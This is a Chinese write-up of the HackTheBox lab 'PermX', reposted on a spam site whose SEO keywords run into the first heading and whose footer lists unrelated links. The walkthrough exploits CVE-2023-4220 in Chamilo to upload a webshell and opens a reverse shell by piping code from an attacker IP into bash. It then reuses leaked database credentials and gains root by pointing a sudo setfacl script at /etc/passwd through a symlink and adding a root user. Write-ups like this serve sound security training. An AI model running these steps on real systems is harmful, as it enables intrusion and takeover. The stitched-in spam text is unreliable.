当前位置: 首页 > news >正文

保险网站建设方案软件开发制作平台

保险网站建设方案,软件开发制作平台,网站图标怎么下载,营销方案案例范文15000x01 立足 信息收集 端口扫描 nmap -sSCV -Pn 10.10.11.23 正常开启22和80端口 访问web页面 并没有看到有攻击点 这个页面可先记录一会儿有需要的话可以尝试xss获取cookie 域名扫描 ffuf -w 1.txt -u http://permx.htb/ -H Host:FUZZ.permx.htb 这里用的ffuf扫描工具 扫出了…

0x01 立足

信息收集

端口扫描

nmap -sSCV -Pn 10.10.11.23

正常开启22和80端口

访问web页面

并没有看到有攻击点

这个页面可先记录一会儿有需要的话可以尝试xss获取cookie

域名扫描

ffuf -w 1.txt -u http://permx.htb/ -H 'Host:FUZZ.permx.htb'

这里用的ffuf扫描工具

扫出了lms子域名

访问lms.permx.htb

访问前先写入hosts文件

windows

linux

这里能看到应该是个系统后台登录

先记录

  1. 是个chamilo的框架,可尝试nday
  2. 可尝试sql注入
  3. 可尝试弱口令
  4. 存在遗忘密码界面,可尝试逻辑漏洞

目录扫描

扫一下子域名目录,顺便基础渗透测试

访问/.bowerrc目录出现一个路径

/app/Resources/public/assets/

再次访问发现出现目录遍历

翻找一圈以后并没有找到利用点

搜索框架看是否存在nday

这里似乎存在CVE-2023-4220

看这个nday的攻击点似乎是在此路径下,去出现目录遍历的地方看是否存在攻击点

访问此路径

/main/inc/lib/javascript/bigupload/files/ 

这里能看到存在上传点以及存在别人上传的后门文件

把poc拉取下来

python3 main.py -u http://lms.permx.htb -a webshell

成功上传shell   kk

这里后续可以继续用poc拿shell这里我是直接执行命令弹shell

可执行命令

尝试反弹shell

这里我用curl反弹shell

curl%2010.10.16.4|bash

拿到shll(注意关闭防火墙如果使用虚拟机的话)

0x02 拿到用户权限

看一下etc/passwd

从这里看有存在的用户只有root和mtz,需要想办法登录mtz

这里在app/config/configuration.php发现敏感信息

发现mysql登录账密
用户:chamilo

密码:03F6lY3uXAP2bkW8

数据库:chamilo

尝试登录mysql

是用chamilo数据库

show tables;

查看数据表有哪些发现存在user表直接访问

存在admin和anon的用户以及密码并没有看到mtz

这里会出现一个问题,找不到密码,数据库里的密码破解出来也登陆不上mtz,后来试了下数据库的密码成功登上了,这个就类似于密码喷洒。

成功登录

0x03 提权

sudo -l看有那些此用户能以root权限使用的程序

这里能看到这里存在一个acl.sh的bash命令文件

查看一下

简单来说这里就是过滤传入参数

最后以sudo执行setfacl命令来更改此文件此用户的权限

首先会接入三个参数需要修改的用户、需要修改的权限、以及需要修改权限的文件


然后会对想修改的文件进行三次判断

  1. 必须是/home/mtz文件下
  2. 不能有..
  3. 必须是文件

这里我原本想到的两个绕过方法都给禁了,软链接和../

#!/bin/bashif [ "$#" -ne 3 ]; then/usr/bin/echo "Usage: $0 user perm file"exit 1
fiuser="$1"
perm="$2"
target="$3"if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then/usr/bin/echo "Access denied."exit 1
fi# Check if the path is a file
if [ ! -f "$target" ]; then/usr/bin/echo "Target must be a file."exit 1
fi/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

软链接绕过

这里尝试了一会儿

利用使用目录创建软链接来绕过他要求只能是文件的过滤

比如说:

平时的软连接是    ln -s /etc/123

/home/123/123    >>  /etc/123

直接使用etc作为软链接    ln -s /etc

/home/123/etc/123    >>    /etc/123

直接拿’/‘跟目录创建软链接或者/etc/创建软链接,如果想直接把root/root.txt创建软链接的话,执行该权限的命令时他会告诉你无法访问没有权限,但是etc文件是可以访问的,直接使用

生成密码

openssl passwd 123456

创建软链接

ln -s /etc

修改权限

sudo /opt/acl.sh mtz rwx /home/mtz/etc/passwd

添加特权用户

echo '123456:$1$mixgqSMG$LOoNrVvfTa2RjhLEFJNQ00:0:0:root:/root:/bin/bash' > /home/mtz/etc/passwd

最后登录123456密码123456

http://www.yayakq.cn/news/897171/

相关文章:

  • 邯郸网站设计多少钱讨债女企业家中标公司被强执
  • 服饰类网站开发项目响应式网站建设软文
  • 网站建设作业怎么写网站设计不同的原因
  • 昆明企业做网站最近的新闻内容
  • 做户外运动的网站网站审核文件
  • 网站欣赏与创建网页17. 整个网站建设中的关键是
  • 做水果网站需要些什么微信小程序开发如何制作
  • 苏州好的做网站的公司有哪些apache怎么配置网站
  • 网站建设如何收费站群管理软件
  • 怎么把做的网站发到网上去网站描文本
  • 做产品推广的网站有哪些软件开发者对要发布的软件进行数字签名
  • 云服务器做视频网站星空传媒有限公司网站
  • 推广网站的论坛网页设计平面设计
  • 全能网站建设完全自学手册监理企业建设部网站年报
  • 做网站 多少人网站格局
  • wdcp网站搬家wordpress 春菜
  • 图片交易网站源码北京网站建设模板下载
  • 额尔古纳网站建设科技创新的重要前沿是
  • 郑州做网站哪家比较好中型企业名录查询系统
  • 联通的网站是谁做的微信公众号定制
  • wordpress站长地图宠物用品技术支持 东莞网站建设
  • 西安设计网站的公司南通网站建设案例
  • 网站开发投票代码做投资的网站好
  • 网站建设费用及预算网址缩短在线生成app
  • 网站转小程序工具网页设计图片排版模板
  • 大城县有做网站的吗网站界面设计稿
  • 洛阳网站开发培训精美ppt模板免费下载完整版
  • 网站开发服务器资源怎么弄虚拟产品网站
  • 海洋高端的专业做网站wordpress创业模式
  • 用自己的电脑做服务器建网站wordpress讨论区插件